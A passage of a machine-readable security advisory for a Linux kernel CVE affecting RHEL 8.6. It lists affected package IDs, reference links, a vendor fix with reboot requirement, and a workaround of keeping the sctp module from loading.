          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-40240"
        },
        {
          "category": "external",
          "summary": "RHBZ#2418832",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418832"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-40240",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-40240",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40240"
        },
        {
          "category": "external",
          "summary": "https://lore.kernel.org/linux-cve-announce/2025120403-CVE-2025-40240-745a@gregkh/T",
          "url": "https://lore.kernel.org/linux-cve-announce/2025120403-CVE-2025-40240-745a@gregkh/T"
        }
      ],
      "release_date": "2025-12-04T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-03-25T00:45:50+00:00",
          "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ],
          "restart_required": {
            "category": "machine"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:5691"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, prevent module sctp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
